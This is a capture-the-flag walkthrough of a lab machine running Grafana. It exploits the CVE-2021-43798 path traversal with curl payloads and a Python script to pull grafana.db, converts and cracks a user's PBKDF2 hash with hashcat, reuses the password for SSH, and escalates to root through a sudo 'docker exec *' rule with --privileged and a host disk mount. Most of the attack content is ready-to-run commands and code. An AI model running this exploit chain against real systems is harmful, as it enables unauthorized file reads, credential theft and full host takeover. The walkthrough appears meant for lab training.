
Enumeration

Nmap

nmap -sV -sC -p- -T4 --min-rate=1000 10.129.234.47

Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-14 12:46 GMT
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:49 (0:00:58 remaining)
Nmap scan report for ip-10-129-234-47.eu-west-2.compute.internal (10.129.234.47)
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 63470a81ad0f7807464b15524a4d1e39 (RSA)
|   256 7da9acfa01e8dd09904048ecddf308be (ECDSA)
|_  256 91332d1a81871a84d3b90b23233d194b (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 14 Nov 2025 12:47:13 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 14 Nov 2025 12:47:18 GMT
|_    Content-Length: 0
  • nmap shows SSH on port 22 and, on port 3000, an HTTP service it cannot name (ppp?) that answers every request with a 302 to /login
  • Navigating to port 3000 in a browser, we see the Grafana login page
    • The exact version number is disclosed in the footer of the page

![[Pasted image 20251115124643.png]]

  • Grafana 8.x (8.0.0-beta1 up to 8.3.0) is vulnerable to an unauthenticated path traversal through the plugin static-file route, CVE-2021-43798: https://hackerone.com/reports/1427086
  • To validate this we can use the payload from the HackerOne report, but request /etc/hostname instead of /etc/passwd for a short, unambiguous output
curl http://10.129.234.47:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname

e6ff5b1cbc85
curl -o grafana.db http://10.129.234.47:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    29  100    29    0     0    270      0 --:--:-- --:--:-- --:--:--   273

ls
grafana.db
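  • The same traversal from Python, as an added example that is not part of the original notes: http.client sends the request target exactly as written, so the ..%2F segments reach Grafana untouched, and the response is classified so that a 302 to /login is reported as a miss instead of being saved as a 29-byte "database". The plugin name mysql, the depth of eleven segments and the URL shape are taken from the page; the SQLite magic check uses the standard 16-byte SQLite 3 file header; function names, the host and the port are my own choices.

```python
#!/usr/bin/env python3
"""Read files through the Grafana plugin path traversal (CVE-2021-43798) with a client that
does not collapse the '..' segments, and sanity-check what came back before trusting it."""
import http.client
import sys
from typing import Optional, Tuple

DEFAULT_PLUGIN = "mysql"                 # any bundled plugin directory works as the entry point
SQLITE_MAGIC = b"SQLite format 3\x00"    # first 16 bytes of every SQLite 3 database file


def build_traversal_path(target: str, plugin: str = DEFAULT_PLUGIN, depth: int = 11) -> str:
    """Request target in the form the report used: '..%2F' repeated `depth` times, then the
    file path with its slashes percent-encoded. Keeping the slashes encoded is what stops an
    HTTP client (curl without --path-as-is, for one) from squashing '/../' before sending."""
    encoded_target = "%2F".join(target.strip("/").split("/"))
    return f"/public/plugins/{plugin}/" + "..%2F" * depth + encoded_target


def classify(status: int, location: Optional[str], body: bytes) -> str:
    """A 302 to /login with a short HTML body is what Grafana returns when the traversal never
    reached the plugin handler (e.g. the client collapsed the '..'), so call that a miss."""
    if status == 200 and body:
        return "hit"
    if status in (301, 302) and location and location.startswith("/login"):
        return "redirected-to-login"
    return f"unexpected-{status}"


def is_sqlite(data: bytes) -> bool:
    """True when the bytes start with the SQLite 3 header; use it before opening grafana.db."""
    return data.startswith(SQLITE_MAGIC)


def fetch(host: str, port: int, target: str, plugin: str = DEFAULT_PLUGIN) -> Tuple[str, bytes]:
    """Send the raw request target (http.client passes it through verbatim) and return
    (verdict, body). Network call; everything above is testable offline."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", build_traversal_path(target, plugin))
        resp = conn.getresponse()
        body = resp.read()
        return classify(resp.status, resp.getheader("Location"), body), body
    finally:
        conn.close()


if __name__ == "__main__":
    # usage: grafana_read.py <host> <port> <file> [outfile]
    #   e.g. grafana_read.py 10.129.234.47 3000 /var/lib/grafana/grafana.db grafana.db
    host, port, target = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    verdict, body = fetch(host, port, target)
    if verdict != "hit":
        sys.exit(f"{verdict}: {len(body)} bytes returned, nothing saved")
    if len(sys.argv) > 4:
        with open(sys.argv[4], "wb") as fh:
            fh.write(body)
        print(f"saved {len(body)} bytes to {sys.argv[4]}; sqlite header: {is_sqlite(body)}")
    else:
        sys.stdout.write(body.decode(errors="replace"))
```

  • If Grafana sits behind a reverse proxy that normalises paths before forwarding, even the encoded form can be collapsed upstream; the classify verdict tells you that happened instead of leaving you with a redirect page named grafana.db.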
  • Before opening it, check what actually came back: file grafana.db should report an SQLite 3.x database. A 29-byte file is the body of the 302 redirect to /login, which is what you get when curl squashes the /../ segments client-side before sending; in that case re-run with curl --path-as-is, or use the ..%2F form from the first request
  • Using sqlitebrowser we can read the contents of the db and extract credentials and other sensitive data; the user table holds the login, password hash and salt columns ![[Pasted image 20251115124711.png]]

  • Two user rows are stored; the one we go after is boris. Read as login:password:salt:rands the row is:

    • boris:dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8:LCBhdtJWjl:mYl941ma8w
    • From the previous link we establish Grafana's scheme: PBKDF2-HMAC-SHA256 with 10000 iterations and a 50-byte output (hence 100 hex characters), salted with the salt column. The rands column is a separate per-user random value and plays no part in the hash
    • hashcat's PBKDF2-HMAC-SHA256 mode expects sha256:<iterations>:<base64 salt>:<base64 hash>, so we write a small Python3 script to convert the row into that format, let's name it convert.py
#! /usr/bin/env python3
import base64
import binascii
import sys

# Password hash (hex) and salt, straight from the grafana.db user table
PASSWORD_HEX = "dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8"
SALT_STR = "LCBhdtJWjl"

# Grafana's PBKDF2 iteration count; hashcat needs it in the hash line
ITERATIONS = 10000

# Decode the hex hash to raw bytes
try:
    target_raw = binascii.unhexlify(PASSWORD_HEX)
except binascii.Error as e:
    print("ERROR: PASSWORD_HEX is not valid hex:", e)
    sys.exit(1)

# Base64 encode the raw hash
target_hash64 = base64.b64encode(target_raw).decode("utf-8")

# Base64 encode the salt (hashcat wants it base64, not plain text)
salt64 = base64.b64encode(SALT_STR.encode("utf-8")).decode("utf-8")

# Finally, print the formatted hash to plug into hashcat (-m 10900)
print(f"sha256:{ITERATIONS}:{salt64}:{target_hash64}")

sudo nano convert.py
chmod +x convert.py
python3 convert.py > hash.txt
cat hash.txt
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
  • That gives us a hash in a format hashcat understands, so we can proceed to crack it
  • To find the right -m mode we search hashcat's help for PBKDF2
hashcat -h | grep PBKDF2
  11900 | PBKDF2-HMAC-MD5                                            | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                           | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                         | Generic KDF
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 2941/5947 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0...O1Hag=
Time.Started.....: Fri Nov 14 13:27:45 2025 (1 sec)
Time.Estimated...: Fri Nov 14 13:27:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1802 H/s (9.70ms) @ Accel:32 Loops:1024 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1280/14344384 (0.01%)
Rejected.........: 0/1280 (0.00%)
Restore.Point....: 1024/14344384 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9216-9999
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> poohbear1

Started: Fri Nov 14 13:27:25 2025
Stopped: Fri Nov 14 13:27:48 2025
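  • An added example that is not part of the original notes: it does what convert.py does above, but for every row of the user table read straight from the sqlite file (the in-memory table here is a constructed stand-in carrying boris's row from the dump), and it verifies a cracked candidate locally with hashlib's PBKDF2 under Grafana's parameters (10000 iterations, 50-byte key, salt column as the salt), so a hashcat result can be double-checked before it is tried over SSH. The function names and the login-prefixed output line are my own choices.

```python
#!/usr/bin/env python3
"""Export every Grafana password hash from grafana.db in hashcat -m 10900 form and verify a
cracked candidate locally with the same PBKDF2 parameters Grafana uses."""
import base64
import binascii
import hashlib
import hmac
import sqlite3
import sys
from typing import Dict

# Grafana's scheme: PBKDF2-HMAC-SHA256, 10000 iterations, 50-byte key, hex encoded, salted with
# user.salt. hashcat mode 10900 takes sha256:<iterations>:<base64 salt>:<base64 hash>.
ITERATIONS = 10000
KEY_LEN = 50

# boris's row as dumped from grafana.db on the page
BORIS_HASH_HEX = ("dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be2"
                  "20745be3cbe49353e35f53b51da8")
BORIS_SALT = "LCBhdtJWjl"


def open_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for a downloaded grafana.db: only the user columns used here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (login TEXT, password TEXT, salt TEXT, rands TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?, ?, ?)",
                 ("boris", BORIS_HASH_HEX, BORIS_SALT, "mYl941ma8w"))
    conn.commit()
    return conn


def to_hashcat_10900(password_hex: str, salt: str, iterations: int = ITERATIONS) -> str:
    """One hashcat line; binascii.Error is raised if the hex column is malformed."""
    raw = binascii.unhexlify(password_hex)
    return "sha256:{}:{}:{}".format(
        iterations,
        base64.b64encode(salt.encode("utf-8")).decode("ascii"),
        base64.b64encode(raw).decode("ascii"),
    )


def export_hashes(conn: sqlite3.Connection) -> Dict[str, str]:
    """login -> hashcat line. Rows with an empty password (externally authenticated users)
    have nothing to crack and are skipped."""
    out: Dict[str, str] = {}
    for login, password_hex, salt in conn.execute("SELECT login, password, salt FROM user"):
        if not password_hex:
            continue
        out[login] = to_hashcat_10900(password_hex, salt)
    return out


def verify_password(candidate: str, password_hex: str, salt: str) -> bool:
    """Re-derive the 50-byte key and compare in constant time against the stored hash."""
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), salt.encode("utf-8"),
                                  ITERATIONS, dklen=KEY_LEN)
    return hmac.compare_digest(derived, binascii.unhexlify(password_hex))


if __name__ == "__main__":
    # usage: grafana_hashes.py [grafana.db] [login candidate]
    conn = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else open_sample_db()
    for login, line in export_hashes(conn).items():
        print(f"{login}:{line}")   # feed the file to: hashcat -m 10900 --username hashes.txt wordlist
    if len(sys.argv) > 3:
        login, candidate = sys.argv[2], sys.argv[3]
        row = conn.execute("SELECT password, salt FROM user WHERE login = ?", (login,)).fetchone()
        ok = bool(row) and verify_password(candidate, *row)
        print(f"{login}:{candidate} -> {'valid' if ok else 'wrong'}")
```

  • The login prefix on each line is for hashcat's --username option, which keeps the user name out of the hash but prints it with the cracked result, handy when the table has more than one row.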
  • Password found: beautiful1
  • Now we can SSH in as boris with it (the Grafana password is reused for the OS account)
 ssh boris@10.129.234.47

The authenticity of host '10.129.234.47 (10.129.234.47)' can't be established.
ED25519 key fingerprint is SHA256:kKsFY4lOfr5Romb/aAy0GtkTZTFbOGC5rZwkh4dGx+s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.234.47' (ED25519) to the list of known hosts.
boris@10.129.234.47's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.4.0-1103-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Nov 14 13:31:50 UTC 2025

  System load:  1.74              Processes:              207
  Usage of /:   38.0% of 4.78GB   Users logged in:        0
  Memory usage: 14%               IP address for eth0:    10.129.234.47
  Swap usage:   0%                IP address for docker0: 172.17.0.1

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

122 additional security updates can be applied with ESM Infra.
Learn more about enabling ESM Infra service for Ubuntu 18.04 at
https://ubuntu.com/18-04

Last login: Wed Jun  4 13:37:31 2025 from 10.10.14.62
boris@data:~$ls
user.txt
boris@data:~$ cat user.txt
09e30d9842af2a0603cbeb9be35cf2a4
boris@data:~$

Privilege Escalation

boris@data:~$ sudo -l

Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *
  • The sudo rule only pins the first two words of the command line, so the trailing * lets us pass any options to docker exec, including -u root and --privileged. The rule does not cover docker ps, but we already know which container to target: the hostname e6ff5b1cbc85 we read through the path traversal is a Docker short container ID (Docker sets a container's hostname to its ID by default), so Grafana is running in that container
  • --privileged on docker exec runs the command with the full capability set, CAP_SYS_ADMIN included, which is what mount needs. Once in the container we check which block device holds the host filesystem: the mount output shows /dev/sda1 bind-mounted over /etc/hostname, /etc/hosts and /etc/resolv.conf, so it is the host's root filesystem, and we mount it on /mnt
  • If /dev/sda1 is missing from the container's /dev, create the node first with mknod /dev/sda1 b 8 1, taking the major and minor numbers from /proc/partitions
sudo docker exec -u root --privileged -it e6ff5b1cbc85 bash
bash-5.1# mount

overlay on / type overlay (rw,relatime,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/2RMRALAZ4X3ETWWAFIO4URLCKU:/var/snap/docker/common/var-lib-docker/overlay2/l/C32RR2IYKIVOXMXZVRUH2EGVMU:/var/snap/docker/common/var-lib-docker/overlay2/l/CAVZGWG6DT37UBOHM6XHIUZUD5:/var/snap/docker/common/var-lib-docker/overlay2/l/3ATFAZLXUKTZ62T23IWWGNRXD2:/var/snap/docker/common/var-lib-docker/overlay2/l/42TJD6WDSINN56AZRW55R3ICO6:/var/snap/docker/common/var-lib-docker/overlay2/l/UTHFBRCC4KFYKXNBPIO52AZ7OQ:/var/snap/docker/common/var-lib-docker/overlay2/l/ZJJZSZR34MKC5KWMDRYIC4Q62C:/var/snap/docker/common/var-lib-docker/overlay2/l/EAWF5T66G6Z67H3LBO75E3NZCC:/var/snap/docker/common/var-lib-docker/overlay2/l/LMHE5BSBLFJITZ67RL5JIEM4SC,upperdir=/var/snap/docker/common/var-lib-docker/overlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/work,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime)

bash-5.1# mount /dev/sda1 /mnt
bash-5.1# ls -la /mnt/root/root.txt
-rw-r-----    1 root     root            33 Nov 14 12:44 /mnt/root/root.txt
bash-5.1# cat /mnt/root/root.txt
17765425b664ff743fb017ff24363329

🥂